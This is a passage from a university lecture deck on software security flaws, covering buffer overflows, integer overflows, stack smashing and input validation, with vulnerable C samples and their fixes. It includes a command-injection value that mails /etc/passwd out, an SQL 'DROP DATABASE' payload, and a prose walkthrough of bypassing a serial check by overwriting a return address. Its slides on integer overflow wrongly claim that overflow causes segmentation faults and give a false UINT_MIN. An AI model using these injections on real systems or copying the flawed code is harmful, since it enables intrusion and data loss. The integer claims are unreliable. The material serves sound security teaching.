
Page 1: Introduction to Software Security, Software Flaws · securesw.dankook.ac.kr/ISS18-1/ISS_2018_04_SW_flaws.pdf · 2018. 3. 17. · N. Vlajic, CSE 3482: Introduction to Computer Security

Seong-je Cho

Spring 2018

Computer Security & Operating Systems Lab, DKU

Introduction to Software Security

Software Flaws (chapter 11)

Page 2:

Sources / References

Textbook

N. Vlajic, CSE 3482: Introduction to Computer Security, Yorku

Nicholas Weaver, Computer Science 161: Computer Security, Berkeley

Myrto Arapinis, Computer Security: INFRA10067, University of Edinburgh

2011 CWE/SANS Top 25 Most Dangerous Software Errors

Lecture 12 Program Security, CS 450/650 Lecture

Please do not duplicate and distribute

Computer Security & OS Lab, DKU

Page 3:

Contents

Software Security Issues

The 10 Worst Vulnerabilities of the last 10 years – Dark Reading

Software Bug/Flaw/Vulnerability

Buffer Overflows

Stack Buffer Overflows = Stack Smashing

Integer Overflows

Incomplete Mediation

Race Conditions, Format String Bugs


Page 4:

Why Software?

Why is software as important to security as crypto, access control and protocols?

Virtually all of information security is implemented in software.

If your software is subject to attack, your security is broken, regardless of the strength of the crypto, access control or protocols.

Software is a poor foundation for security

Software Flaws = Software Vulnerability

Software Weakness


Page 5:

Bad Software

Bad software is everywhere!

NASA Mars Lander (cost $165 million)

Crashed into Mars

Error in converting English and metric units of measure

Denver airport (in 1994)

Buggy baggage handling system

Delayed airport opening by 11 months

Cost of delay exceeded $1 million/day

MV-22 Osprey: Advanced military aircraft

Lives have been lost due to faulty software


Page 6:

SW bugs can prove deadly

Gamers May Fight Deadly Software Bugs in US Military Weapons [Jan. 23 2012, Technews]

a lesson learned when a buggy Patriot missile defense system failed to intercept a Scud missile that killed 28 American soldiers during the first Gulf War in 1991.

To prevent such weapons disasters, the U.S. military wants to transform dull bug-hunting tasks into fun problem-solving games that attract swarms of online players

Bug can cause deadly failures when anesthesia device is connected to cell phones [Apr. 23 2014, ars-technica]

Federal safety officials have issued an urgent warning about software defects in an anesthesia delivery system that can cause life-threatening failures at unexpected times, including when a cellphone or other device is plugged into one of its USB ports.

Spacelabs Healthcare is recalling the ARKON Anesthesia System with Version 2.0 Software due to a software defect.

Vocabulary note: anesthesia = loss of sensation (Korean: 마취, 무감각증)


Page 7:

The 10 Worst Vulnerabilities of The Last 10 Years

(Dark Reading, 5/6/2016)

See also “The 5 Most Dangerous Software Bugs of 2014”


Page 8:

OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

The Heartbleed Bug in the OpenSSL cryptographic library exposed SSL-based websites and software to attacks that would have allowed information theft on an unprecedented scale.

Nearly one-third of all major websites were believed vulnerable to the issue when Heartbleed was first disclosed in April 2014.

Because the vulnerability existed in the SSL/TLS encryption that websites and software use to protect information, the bug gave attackers an opportunity to eavesdrop on Web traffic, spoof users and servers and steal data directly from them.


Page 9:

Shellshock (CVE-2014-6271)

GNU Bash Remote Code Execution Vulnerability

Shellshock affected most versions of Unix, Linux and Mac OS X and allowed attackers to execute malicious code on vulnerable systems.

Some analysts estimated that nearly half a billion Internet connected devices and web servers were vulnerable to the issue at the time the bug was disclosed, including web servers, Android devices, OpenBSD, DHCP clients, SSH servers and Mac OSX devices.


Page 10:

Stagefright Vulnerabilities: CVE-2015-1538, CVE-2015-1539, CVE-2015-3824

Multiple remotely exploitable vulnerabilities in Android’s Stagefright multimedia framework library pushed Google into instituting a monthly patch release process for Android and put pressure on other handset makers to do the same.

The flaws, in a core Android component that handles all video and audio files and provides playback facilities, affected all versions of Android going back to Froyo and impacted nearly a billion Android devices.

Stagefright basically gave attackers armed with only a victims’ phone number, a way to use specially crafted MMS messages to execute malicious code on vulnerable devices.

The vulnerabilities did not require the victim to take any action in order for malicious code to be executed on their devices.

The flaws have been described as by far the worst ever to hit Android to date.

Google has patched dozens of vulnerabilities in the media-server component since Zimperium’s original vulnerability disclosure.


Page 11:

SSL 3.0 Protocol Vulnerability and POODLE Attack (CVE-2014-3566)

The SSL 3.0 Protocol Vulnerability and the associated Padding Oracle On Downgraded Legacy Encryption (POODLE) exploit of 2014 stemmed from a weakness in the SSL 3.0 protocol related to the encryption of whole data blocks.

The weakness gives attackers a way to break encrypted communications between a Web server and client browser and to steal authentication cookies and other data.

The POODLE attack basically demonstrated how threat actors could take advantage of a backwards-compatibility feature built into SSL/TLS to force browsers and web servers to use the vulnerable SSL 3.0 protocol and thereby break encrypted communications.

While SSL 3.0 is an old encryption standard and has generally been replaced by TLS, most SSL/TLS implementations remain backwards compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience.


Page 12:

Remote Code Execution Vulnerability in MS Server Service (CVE-2008-4250)

This buffer overflow vulnerability in the Server Service in multiple versions of Windows, including Windows 2000 SP4, XP SP2 and SP3 and Server 2008, gave attackers a way to remotely execute malicious code on vulnerable systems using a specially crafted remote procedure call.

What made the flaw dangerous was the fact that attackers could run arbitrary code on vulnerable systems without any authentication.


Page 13:

glibc: getaddrinfo stack-based buffer overflow (CVE-2015-7547)

Earlier that year (2016), security researchers at Google and Red Hat disclosed a critical buffer overflow vulnerability in the GNU C Library (glibc) used by all major Linux distributions.

The flaw existed in a DNS client-side resolver in glibc, and was exploitable through the use of a particular function called getaddrinfo().

It allowed attackers to use DNS servers or domains under their control to essentially take over systems and applications running the flawed software.

All major Linux distributions and the glibc project have issued patches for the problem.


Page 14:

Bad USB

Its implications are broad and scary, considering the ubiquitous use of USB devices, according to researchers from Germany-based Security Research Labs, who first raised the issue in a Black Hat presentation in 2014.

The researchers showed how it is possible for attackers to convert a benign USB device into a malicious one by quietly reprogramming its controller chip through a firmware update.

According to the researchers, widely used USB controller chips, such as those used in thumb drives, are not protected against such modification.

Reprogrammed USB devices can be used to surreptitiously carry out a slew of malicious tasks including stealing data and files, installing malware, redirecting traffic and infecting other USB devices.


Page 15:

Software Security Issues (Software Bugs)


Page 16:

Threats of Insecure Software

Successful exploitation of insecure software can lead to data breach and information leakage (confidentiality exposure), modification or alteration of data (integrity exposure) and/or defacement, downtime, and denial of service (availability exposure), besides financial loss.

Undetected and surreptitious exploitation can also lead to implantation of malicious software (Malware) within your organization, giving the malicious attacker both the ability and potential to attack any time, even perpetually.

Vocabulary note: surreptitious = secret, stealthy (Korean: 은밀한, 슬쩍하는)

Vocabulary note: perpetually = permanently, continuously (Korean: 영구히, 영속적으로)


Page 17:

Software Issues

“Normal” users

Find bugs and flaws by accident

Hate bad software…

… but must learn to live with it

Must make bad software work

Attackers

Actively look for bugs and flaws

Like bad software…

… and try to make it misbehave

Attack systems thru bad software

Page 18:

Complexity

“Complexity is the enemy of security”, Paul Kocher, Cryptography Research, Inc.


A new car contains more LOC than was required to land the Apollo astronauts on the moon

System          Lines of code (LOC)
Netscape        17,000,000
Space shuttle   10,000,000
Linux            1,500,000
Windows XP      40,000,000
Boeing 777       7,000,000

Page 19:

Lines of Code and Bugs

Conservative estimate: 5 bugs/1000 LOC

Do the math:

Typical computer: 3,000 exe’s of 10K each

Conservative estimate of 50 bugs/exe

About 3K X 50 = 150K bugs per computer

30,000 node network has 4.5 billion bugs

Suppose that only 10% of bugs are security-critical and only 10% of those are remotely exploitable

Then “only” 45 million critical security flaws!


Page 20:

Software Security Topics

Program flaws (unintentional)

Buffer overflow

Incomplete mediation

Race conditions

Malicious software (intentional)

Viruses

Worms

Other breeds of malware


Page 21:

Program Flaws

An error (Korean: 오류) is a programming mistake. To err is human.

An error may lead to an incorrect state: a fault (Korean: 결점)

A fault is internal to the program

A fault may lead to a failure (Korean: 실패), where a system departs from its expected behavior

A failure is externally observable

Error → Fault → Failure

Page 22:

Example

This program has an error

This error might cause a fault

Incorrect internal state

If a fault occurs, it might lead to a failure

Program behaves incorrectly (external)

We use the term flaw (Korean: 결함) for all of the above

int i;
char array[10];

for (i = 0; i < 10; ++i)
    array[i] = 'A';      /* indices 0..9 are in bounds */

array[10] = 'B';         /* the error: writes one element past the end of array */

Page 23:

Program Flaws

Program flaws are unintentional, but still create security risks

We’ll consider 3~4 types of flaws:

Buffer overflow (smashing the stack)

Integer overflow

Incomplete mediation

Race conditions (?)

Many other flaws can occur

These are most common


Page 24:

Secure Software

In software engineering, we try to ensure that a program does what is intended

Secure software engineering requires that the software does what is intended… and nothing more

Absolutely secure software is impossible

Absolute security is almost never possible!

How can we manage the risks?


Page 25:

Buffer Overflow (BoF)


Page 26:

Example Vulnerable C Program


#include <string.h>

#define MAX_LEN 10

/* Deliberately vulnerable: t holds MAX_LEN bytes, but strcpy and strcat
   copy without any length check */
int unsafe ( char *a, char *b ) {
    char t[MAX_LEN];
    strcpy (t, a);
    strcat (t, b);
    return strcmp (t, "abc");
}

int main(void) {
    unsafe("123", "abc");             /* "123abc" plus NUL = 7 bytes: fits in t */
    unsafe("1234567", "890abcdef");   /* 7 + 9 + NUL = 17 bytes: overflows t */
    return 0;
}

Page 27:

An Unsafe Program


#include <limits.h>
#include <stdio.h>

int main(void) {
    int i;
    unsigned int j;

    i = INT_MAX;             // 2,147,483,647
    i++;                     // signed overflow: undefined behaviour in C, wraps on typical hardware
    printf ("i = %d \n", i);

    j = UINT_MAX;            // 4,294,967,295
    j++;                     // unsigned overflow: wraps modulo 2^32, well defined
    printf ("j = %u \n", j);
    return 0;
}

Output (as annotated on the slide):

i = -2,147,483,648

j = 0

Page 28:

Another Example


Page 29:

1988: Morris Internet Worm

fingerd.c:

char line[512];
line[0] = '\0';
gets(line);          /* gets() has no length limit: input longer than 512 bytes overflows line */

Results in 6,000 computers being infected.

Fingerd bug fix:

memset(line, 0, sizeof(line));
fgets(line, sizeof(line), stdin);    /* reads at most sizeof(line) - 1 bytes and terminates */


Page 30:

String Null Termination Errors #1


#include <string.h>

int main (int argc, char *argv[]) {
    char cmdline [4096];
    cmdline[0] = '\0';    // what if this line were missing?

    for (int i = 1; i < argc; ++i) {
        strcat (cmdline, argv [i]);
        strcat (cmdline, " ");
    }
    /* … */
    return 0;
}

strcat – append a string to another

ptr = strcat (s1, s2);

Both strings “s1” and “s2” must be terminated by the usual ‘\0’ character.

Page 31:

String Null Termination Errors #2


char *string_data;
char a[16];
/* . . . */
strncpy (a, string_data, sizeof(a));

How many problems are there?

If string_data is NULL, …

If the length of string_data is greater than the size of a, …

Page 32:

Null-Termination Errors

Another common problem with C-style strings is a failure to properly null terminate

#include <string.h>

int main(int argc, char* argv[]) {
    char a[16];
    char b[16];
    char c[32];

    strncpy(a, "0123456789abcdef", sizeof(a));   /* 16 chars fill a: no room for the NUL */
    strncpy(b, "0123456789abcdef", sizeof(b));   /* same for b */
    strncpy(c, a, sizeof(c));                    /* reads past a looking for a NUL that is not there */
}

Neither a[] nor b[] is properly terminated
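The two strncpy slides above ask what goes wrong when the source is NULL or longer than the destination. The following helper is an added example, not code from the slides: it is a hypothetical copy_str() that always leaves a terminated string in the destination, reports truncation, and refuses a NULL source, then replays the three-buffer scenario from the slide with it.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not from the slides): copy src into dst[dstsz],
 * always NUL-terminating the result.
 * Returns 0 on a full copy, 1 if the string was truncated to fit,
 * and -1 if src is NULL or dstsz is 0 (dst becomes "" when possible). */
int copy_str(char *dst, size_t dstsz, const char *src) {
    if (dstsz == 0) return -1;
    if (src == NULL) {             /* strncpy(a, NULL, n) would dereference NULL */
        dst[0] = '\0';
        return -1;
    }
    size_t n = strlen(src);
    if (n >= dstsz) {              /* no room for the terminator: truncate */
        memcpy(dst, src, dstsz - 1);
        dst[dstsz - 1] = '\0';
        return 1;
    }
    memcpy(dst, src, n + 1);       /* n + 1 includes the terminating NUL */
    return 0;
}

/* Mirrors the slide's three buffers; every buffer ends up terminated.
 * Returns 1 when all three copies report the expected status. */
int demo(void) {
    char a[16], b[16], c[32];
    int ra = copy_str(a, sizeof a, "0123456789abcdef");  /* 16 chars: truncated to 15 */
    int rb = copy_str(b, sizeof b, NULL);                 /* NULL source handled, b == "" */
    int rc = copy_str(c, sizeof c, a);                    /* a is a valid string now */
    printf("a=\"%s\" (%d)  b=\"%s\" (%d)  c=\"%s\" (%d)\n", a, ra, b, rb, c, rc);
    return ra == 1 && rb == -1 && rc == 0 && strlen(c) == 15;
}

int main(void) { return demo() ? 0 : 1; }
```

The return value is the point: strncpy gives the caller no signal that truncation happened, so the missing terminator is discovered only when some later read runs off the end of the buffer.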

Page 33:

Passing Strings to Complex Subsystems

Improper Data Sanitization

An application inputs an email address from a user and writes the address to a buffer [Viega 03]

sprintf (buffer, "/bin/mail %s < /tmp/email", addr);
system (buffer);

Normal input: [email protected]

What if: [email protected]; cat /etc/passwd | mail [email protected]

[Viega 03] Viega, J., and M. Messier. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003.
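Two things go wrong in the sprintf/system pair above: the address is never checked, and system() hands the whole string to a shell, which interprets ';' and '|' as command separators. The following is an added example, not code from the slides or from [Viega 03]: a hypothetical is_safe_mail_addr() that only accepts a conservative local@domain shape, and a send_mail() that runs /bin/mail through execv() with the address as a single argv element, so no shell ever parses it. The sample addresses are constructed for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define MAX_ADDR 254

/* Hypothetical validator: accept only "local@domain" with a conservative
 * character set. Shell metacharacters (';', '|', '<', '>', '$', '`', spaces)
 * are not in the allowed set and are therefore rejected. */
int is_safe_mail_addr(const char *addr) {
    if (addr == NULL) return 0;
    size_t len = strlen(addr);
    if (len == 0 || len > MAX_ADDR) return 0;
    const char *at = strchr(addr, '@');
    if (at == NULL || at == addr || at[1] == '\0' || strchr(at + 1, '@') != NULL)
        return 0;                                  /* exactly one '@', both sides non-empty */
    for (const char *p = addr; p < at; p++) {
        unsigned char ch = (unsigned char)*p;
        if (!(isalnum(ch) || strchr("._%+-", ch))) return 0;
    }
    for (const char *p = at + 1; *p; p++) {
        unsigned char ch = (unsigned char)*p;
        if (!(isalnum(ch) || ch == '.' || ch == '-')) return 0;
    }
    return 1;
}

/* Run /bin/mail with addr as one argument and /tmp/email on stdin.
 * No shell is involved, so nothing in addr can become a second command.
 * Returns the child's exit status, or -1 on error or a rejected address. */
int send_mail(const char *addr) {
    if (!is_safe_mail_addr(addr)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (freopen("/tmp/email", "r", stdin) == NULL) _exit(127);
        char *const argv[] = {"/bin/mail", (char *)addr, NULL};
        execv(argv[0], argv);
        _exit(127);                                /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char *argv[]) {
    /* Constructed inputs: a normal address and an injection attempt shaped like the slide's. */
    const char *good = "alice@example.com";
    const char *bad  = "alice@example.com; cat /etc/passwd | mail mallory@example.net";
    printf("%s -> %s\n", good, is_safe_mail_addr(good) ? "accepted" : "rejected");
    printf("%s -> %s\n", bad,  is_safe_mail_addr(bad)  ? "accepted" : "rejected");
    if (argc > 1) return send_mail(argv[1]) == 0 ? 0 : 1;   /* only sends when asked */
    return 0;
}
```

Either measure alone helps; together they are defence in depth. The allowlist stops the malformed input at the boundary, and execv() means that even an address the validator wrongly accepted would reach /bin/mail as data rather than as shell syntax.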


Page 34:

Typical Attack Scenario

1. Users enter data into a Web form

2. Web form is sent to server

3. Server writes data to buffer, without checking length of input data

4. Data overflows from buffer

Sometimes, overflow can enable an attack

Web form attack could be carried out by anyone with an Internet connection


Page 35:

Buffer Overflow

Q: What happens when this is executed?

A: It depends on what resides in memory at locations “buffer[20]” and “buffer[30]”

Might overwrite user data or code

Might overwrite system data or code

int main(){
    int arr[10];
    int buffer[10];
    buffer[20] = 37;    /* both writes are outside buffer[0..9] */
    buffer[30] = 58;
}

Page 36:

Simple Buffer Overflow

Consider boolean flag for authentication

Buffer overflow could overwrite flag allowing anyone to authenticate!

In some cases, attacker need not be so lucky as to have overflow overwrite flag

[Figure: Boolean flag = F next to a buffer holding “F O U R S C …”]

Page 37:

Simple Buffer Overflow

Consider boolean flag for authentication

Buffer overflow could overwrite flag allowing anyone to authenticate!

In some cases, attacker need not be so lucky as to have overflow overwrite flag

[Figure: the overflow from the buffer “F O U R S C …” has overwritten the Boolean flag with T]

Page 38:

Memory Organization

Text == code

Data == static variables

Heap == dynamic data

Stack == “scratch paper”: dynamic local variables

Parameters to functions

Return address

[Figure: memory layout from high address to low address: stack (SP), heap, data, text]

Page 39:

Simplified Stack Example

Chapter 11 Software flaws and malware

void func(int a, int b){
    char buffer[10];
}

void main(){
    func(1, 2);
}

[Figure: stack, drawn from high address to low address]

Page 40:

Simplified Stack Example

[Same func/main code as the previous slide]

[Figure: stack frame for func(1, 2) containing b, a, ret and buffer, with SP advancing as each is pushed]

Page 41:

Simplified Stack Example

[Same func/main code as the previous slide]

[Figure: same frame (b, a, ret, buffer); ret is the return address]

Page 42:

Smashing the Stack

What happens if buffer overflows?

[Figure: stack frame with buffer, a, b and ret, high address to low address]

Page 43:

Smashing the Stack

What happens if buffer overflows?

[Figure: the overflow spreads from buffer across the rest of the frame]

Page 44:

Smashing the Stack

What happens if buffer overflows?

[Figure: ret… overwritten by the overflow]

Program “returns” to wrong location

NOT!

???

A crash is likely

Page 45:

Stack Smashing Example

Program asks for a serial number that the attacker does not know

Attacker also does not have the source code

Attacker does have the executable (exe)

Program quits on incorrect serial number

Page 46:

Stack Smashing Example

By trial and error, attacker discovers an apparent buffer overflow

Note that 0x41 is “A”

Looks like ret was overwritten by 2 bytes!

Page 47:

Stack Smashing Example

Next, disassemble bo.exe to find


The goal is to exploit buffer overflow to jump to address 0x401034


Page 48:

Stack Smashing Example

Find that 0x401034 is “@^P4” in ASCII


Byte order is reversed? Why?

X86 processors are “little-endian”


Page 49:

Stack Smashing Example

Reverse the byte order to “4^P@” and…


Success! We’ve bypassed serial number check by exploiting a buffer overflow

Overwrote the return address on the stack


Page 50:

Stack Smashing Example

Attacker did not require access to the source code

Only tool used was a disassembler, to determine the address to jump to

Can find the address by trial and error

Necessary if attacker does not have exe

For example, a remote attack


Page 51:

Stack Smashing Example

Source code of the buffer overflow


Flaw easily found by attacker

Even without the source code!


Page 52:

Stack Smashing Prevention

1st choice: employ a non-executable stack, the “No execute” NX bit (if available)

Seems like the logical thing to do, but some real code executes on the stack! (Java does this)

2nd choice: use safe languages (Java, C#)

3rd choice: use safer C functions. For unsafe functions, there are safer versions

For example, strncpy / strlcpy instead of strcpy


Page 53:

Example Vulnerable C Program Fix

#include <string.h>

#define MAX_LEN 10

/* The vulnerable version, repeated here as the starting point for the fix */
int unsafe ( char *a, char *b ) {
    char t[MAX_LEN];
    strcpy (t, a);
    strcat (t, b);
    return strcmp (t, "abc");
}

int main(void) {
    unsafe("1234567", "890abcdef");   /* 7 + 9 + NUL = 17 bytes: overflows t */
    return 0;
}
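The prevention slide recommends safer C functions, and the fix slide leaves the repair of unsafe() as the exercise. The block below is an added example, not the lecture's answer: a hypothetical safe() that computes the space the concatenation needs, refuses the call when it would not fit in t[MAX_LEN], and otherwise builds the string with a bounded snprintf(). The lengths of the two calls are taken from the slide.

```c
#include <stdio.h>
#include <string.h>

#define MAX_LEN 10

/* Hardened counterpart of the slide's unsafe(). The concatenation is only
 * performed if both strings and the terminating NUL fit in t[MAX_LEN].
 * Returns 0 and stores strcmp(t, "abc") in *cmp, or -1 if the inputs
 * would overflow t (nothing is written in that case). */
int safe(const char *a, const char *b, int *cmp) {
    char t[MAX_LEN];
    size_t need = strlen(a) + strlen(b) + 1;         /* +1 for the NUL terminator */
    if (need > sizeof t) return -1;                  /* reject instead of overflowing */
    int n = snprintf(t, sizeof t, "%s%s", a, b);     /* bounded write, always terminated */
    if (n < 0 || (size_t)n >= sizeof t) return -1;   /* defensive: cannot happen after the check */
    *cmp = strcmp(t, "abc");
    return 0;
}

/* Convenience wrapper: 1 only when the inputs fit and concatenate to "abc". */
int safe_matches_abc(const char *a, const char *b) {
    int cmp;
    return safe(a, b, &cmp) == 0 && cmp == 0;
}

int main(void) {
    int cmp;
    if (safe("123", "abc", &cmp) == 0)
        printf("\"123abc\" vs \"abc\": strcmp = %d\n", cmp);
    if (safe("1234567", "890abcdef", &cmp) != 0)
        printf("rejected: 7 + 9 + 1 = 17 bytes do not fit in %d\n", MAX_LEN);
    return 0;
}
```

Note that the caller now has to handle the rejection. That is the trade-off with strncpy/strlcpy as well: a bounded copy that silently truncates keeps memory intact but can still change the program's meaning, so an explicit length check with an error return is preferable when the full string matters.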

Page 54:

Integer Overflow


Page 55:

Integer Overflow Examples

Example 1

#include <stdio.h>

int main(void){
    unsigned int num = 0xffffffff;
    printf("num = %u (0x%x)\n", num, num);
    printf("num + 1 = 0x%x\n", num + 1);
    return 0;
}
/* EOF */

The output of this program looks like this:

num = 4294967295 (0xffffffff)
num + 1 = 0x0

Example 2

#include <stdio.h>

int main(void){
    int n;
    n = 0x7fffffff;
    printf("n = %d (0x%x)\n", n, n);
    printf("n + 1 = %d (0x%x)\n", n + 1, n + 1);
    return 0;
}
/* EOF */

The output of which is:

n = 2147483647 (0x7fffffff)
n + 1 = -2147483648 (0x80000000)

Page 56:

Integer Overflow Errors: Addition/Subtraction/Multiplication

unsigned int ui1, ui2, usum;
/* Initialize ui1 and ui2 */
usum = ui1 + ui2;

UINT_MAX = ?

INT_MAX = ?

INT_MIN = ?

sizeof (signed int) = ?

signed int si1, si2, result;
/* Initialize si1 and si2 */
result = si1 * si2;

signed int si1, si2, result;
/* initialize si1 and si2 */
result = si1 - si2;

Page 57:

Integer Ranges

Example integer ranges


Page 58:

Integer Overflow


Page 59:

Integer Underflow


Page 60:

Integer overflow

The size of int depends on the architecture, so on the i386 architecture (32-bit) an int is 32 bits.

If this value can be controlled and a value is submitted that is larger than 32 bits can hold, we will successfully overflow memory.

So, according to C, the maximum value of a signed int is INT_MAX = 2147483647,

and the maximum value of an unsigned int is UINT_MAX = 4294967295 (0xffffffff).

If a value larger than INT_MAX is used, it will trigger a segmentation fault.

Page 61:

Integer underflow

An integer underflow occurs if the integer value used is less than the minimum signed or unsigned int.

This is called an underflow and will also trigger a segmentation fault.

Because the binary representation of the unsigned int -4294967295 is similar to the binary representation of the signed int -1 in memory:

INT_MIN = -2147483647-1

UINT_MIN = -4294967295

Page 62:

Secure Coding

Fun with Integers

    #include <stdio.h>

    int main(void)
    {
        char x, y;
        x = -128;
        y = -x;          /* -x is computed as an int (128) and then narrowed back to char */
        if (x == y) puts("1");
        if ((x - y) == 0) puts("2");
        if ((x + y) == 2 * x) puts("3");
        if (((char)(-x) + x) != 0) puts("4");
        if (x != -y) puts("5");
        return 0;
    }

Page 63:

Secure Coding

Type Conversion

Implicit Conversions
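The table of implicit conversions on this slide was an image and did not survive extraction. As an added example (our code, not from the slides), the following shows the three implicit conversions that most often turn into security bugs: signed/unsigned comparison, a bound that is checked in the signed domain but used in the unsigned domain, and narrowing of an int into a signed char. It assumes a two's-complement machine with a 32-bit int and 8-bit char; all function names are ours.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* 1. Usual arithmetic conversions: in (int) < (unsigned int) the int operand is
 *    converted to unsigned first, so -1 becomes UINT_MAX and -1 < 1u is false. */
bool signed_less_than_unsigned(int s, unsigned int u)
{
    return s < u;
}

/* 2. Bound checked in the signed domain, length used in the unsigned domain.
 *    Returns the byte count a memcpy(dst, src, len) call would receive, or 0
 *    when the check rejects the request. A negative len passes the check
 *    (-1 > 16 is false) and then converts to SIZE_MAX when it reaches size_t. */
size_t copy_len_vulnerable(int len, size_t cap)
{
    if (len > (int)cap)
        return 0;
    return (size_t)len;
}

/* Corrected: reject negatives before any comparison in the unsigned domain. */
bool length_ok(int len, size_t cap)
{
    return len >= 0 && (size_t)len <= cap;
}

/* 3. Narrowing: storing 200 (0xC8) into a signed char keeps the low byte,
 *    which reads back as -56; reading it into an int sign-extends. Bytes taken
 *    from untrusted input should therefore be handled as unsigned char. */
int narrow_to_signed_char(int v)
{
    signed char c = (signed char)v;
    return c;
}

int main(void)
{
    printf("-1 < 1u : %s\n",
           signed_less_than_unsigned(-1, 1u) ? "true" : "false");
    printf("memcpy length for len=-1, cap=16 (vulnerable): %zu\n",
           copy_len_vulnerable(-1, 16));
    printf("length_ok(-1, 16): %s\n", length_ok(-1, 16) ? "ok" : "rejected");
    printf("200 stored in signed char reads back as %d\n",
           narrow_to_signed_char(200));
    return 0;
}
```

Compiling with `-Wsign-compare -Wconversion` flags the first and third cases; the second passes the compiler silently, which is why the explicit `len >= 0` test belongs in the code.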

Page 64:

Incomplete Mediation

Page 65:

Incomplete mediation

Failure to perform “sanity checks” on data can lead to random or carefully planned flaws.

Examples:

Impossible dates in correct format (say yyyyMMMdd):

1800Feb30, 2048Min32

What happens when these dates are looked up in tables in the program?

Alterable parameter fields in URL:

http://www.things.com/order/final&custID=101&part=555A&qy=20&price=10&ship=boat&total=205

Web site adds parameters incrementally as transaction proceeds. User can change them inconsistently.

Page 66:

Incomplete mediation

Inputs to programs are often specified by untrusted users

Web-based applications are a common example

Users sometimes mistype data in forms

Phone number: 51998884567

Email: iang#cs.uwaterloo.ca

An application needs to ensure that what the user has entered constitutes a meaningful request

This is called mediation

Incomplete mediation occurs when the application accepts incorrect data from user

Sometimes this is hard to avoid

Phone number: 519-886-4567

This is a reasonable entry that happens to be wrong

Page 67:

Incomplete mediation

We focus on catching entries that are clearly wrong

Not well formed

DOB: 1980-04-31

Unreasonable values

DOB: 1876-10-12

Inconsistent with other entries

Why do we care?

What happens if someone fills in:

DOB: 98764874236492483649247836489236492

» Buffer overflow?

DOB: '; DROP DATABASE clients --

» SQL injection?

We need to make sure that any user-supplied input falls within well-specified values known to be safe
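As an added example of the mediation this slide asks for (our code, not from the slides), the validator below checks a date-of-birth field in the form YYYY-MM-DD in the order the slide lists: well-formed (fixed length, digits and hyphens only), a real calendar date (so 1980-04-31 fails), and a reasonable year. Because the length and character-set tests run first, the long numeric string and the SQL fragment from the slide never reach any parsing code. The year bounds 1900..2018 are an assumption for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MIN_YEAR 1900   /* assumed "reasonable" range for a date of birth */
#define MAX_YEAR 2018

static bool is_leap(int y)
{
    return (y % 4 == 0 && y % 100 != 0) || y % 400 == 0;
}

static int days_in_month(int y, int m)
{
    static const int days[] = { 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 };
    if (m < 1 || m > 12)
        return 0;
    return (m == 2 && is_leap(y)) ? 29 : days[m - 1];
}

/* Returns true only when dob is exactly "YYYY-MM-DD", contains nothing but
 * digits in the digit positions, and names a real date inside the allowed
 * year range. Everything else (wrong length, quotes, letters, impossible
 * day) is rejected before any value is interpreted. */
bool dob_is_valid(const char *dob)
{
    int y = 0, m = 0, d = 0;
    int i;

    /* 1. Well formed: fixed length first, so over-long input stops here. */
    if (dob == NULL || strlen(dob) != 10)
        return false;
    for (i = 0; i < 10; i++) {
        if (i == 4 || i == 7) {
            if (dob[i] != '-')
                return false;
        } else if (dob[i] < '0' || dob[i] > '9') {
            return false;          /* also rejects ', ;, -- and similar */
        }
    }
    for (i = 0; i < 4; i++)  y = y * 10 + (dob[i] - '0');
    for (i = 5; i < 7; i++)  m = m * 10 + (dob[i] - '0');
    for (i = 8; i < 10; i++) d = d * 10 + (dob[i] - '0');

    /* 2. Reasonable values. */
    if (y < MIN_YEAR || y > MAX_YEAR)
        return false;
    /* 3. Internally consistent: the day must exist in that month and year. */
    if (m < 1 || m > 12)
        return false;
    if (d < 1 || d > days_in_month(y, m))
        return false;
    return true;
}

int main(void)
{
    /* Constructed inputs, including the three examples from the slide. */
    const char *samples[] = {
        "1980-04-30", "1980-04-31", "1876-10-12", "2000-02-29", "1900-02-29",
        "98764874236492483649247836489236492", "'; DROP DATABASE clients --"
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-36s %s\n", samples[i],
               dob_is_valid(samples[i]) ? "accepted" : "rejected");
    return 0;
}
```

The order matters: structural checks before value checks, so that no code path ever interprets input that has not already been shown to have the expected shape.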

Page 68:

Incomplete Mediation

Sensitive data are in exposed, uncontrolled condition

Unchecked data are a serious vulnerability!

Possible scenarios

Supplying the wrong type of data being requested.

Supplying the wrong length of data being requested.

In a system, a user is allowed to edit input directly

In a system, a server does not check validity of data values received from client

In a system, a client returns a sensitive result (like total) that can be easily recomputed by server

Problems

System fails

Supply of Bad Data

Must be checked by programmer

Client side versus server side

Page 69:

Input Validation

Consider: strcpy(buffer, argv[1])

A buffer overflow occurs if

len(buffer) < len(argv[1])

Software must validate the input by checking the length of argv[1]

Failure to do so is an example of a more general problem: incomplete mediation
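As an added example of the length check this slide calls for (our code, not from the slides), here is a bounded replacement for strcpy(buffer, argv[1]). One caveat the slide's condition glosses over: a C string of strlen(src) characters needs strlen(src) + 1 bytes for its terminating NUL, so the copy is safe only when strlen(src) < sizeof(buffer), and the equal case must also be rejected. The function scans src no further than the buffer size, so an unterminated source cannot cause an over-read either.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example: copy src into dst[dstsize] only if it fits INCLUDING the
 * terminating NUL. Returns false (and leaves dst untouched) otherwise;
 * silently truncating would change the data instead of rejecting it. */
bool copy_arg(char *dst, size_t dstsize, const char *src)
{
    size_t n;

    if (dst == NULL || src == NULL || dstsize == 0)
        return false;
    /* Find the length without reading past dstsize bytes of src. */
    for (n = 0; n < dstsize && src[n] != '\0'; n++)
        ;
    if (n == dstsize)            /* no NUL within dstsize bytes: too long */
        return false;
    memcpy(dst, src, n + 1);     /* n characters plus the NUL */
    return true;
}

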